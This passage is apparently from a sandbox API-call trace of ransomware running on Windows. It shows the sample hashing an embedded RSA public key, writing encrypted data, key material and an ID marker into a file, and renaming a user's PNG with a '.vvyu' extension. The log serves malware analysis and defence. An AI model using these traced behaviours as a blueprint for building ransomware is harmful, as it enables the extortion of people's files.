KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.432] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.432] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.432] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0190.433] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.433] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.433] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.433] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.433] GetLastError () returned 0x0 [0190.433] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.433] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0190.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.434] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.434] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.434] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5ad0) returned 0x2d45778 [0190.434] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30cb8 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30c70 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.435] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bd70 [0190.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0190.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b68 [0190.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39b50 [0190.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0190.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0190.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bd70 | out: hHeap=0x6a0000) returned 1 [0190.438] GetCurrentThreadId () returned 0x264 [0190.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44630 [0190.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.439] GetCurrentThreadId () returned 0x264 [0190.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82d20 [0190.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b68 [0190.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bc8 [0190.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0190.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39be0 [0190.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b80 [0190.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b50 [0190.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30c70 | out: hHeap=0x6a0000) returned 1 [0190.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.452] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x5ac6, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x5ac6, lpOverlapped=0x0) returned 1 [0190.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.453] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5acb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.453] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0190.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0190.454] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.455] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.455] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.455] CloseHandle (hObject=0x584) returned 1 [0190.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0190.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.457] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\XI5TTs XOUtx12juL.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\xi5tts xoutx12jul.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\XI5TTs XOUtx12juL.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\xi5tts xoutx12jul.png.vvyu")) returned 1 [0190.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.458] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.461] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59e24170, ftCreationTime.dwHighDateTime=0x1d8a60f, ftLastAccessTime.dwLowDateTime=0xce4c2280, ftLastAccessTime.dwHighDateTime=0x1d8a6e4, ftLastWriteTime.dwLowDateTime=0xce4c2280, ftLastWriteTime.dwHighDateTime=0x1d8a6e4, nFileSizeHigh=0x0, 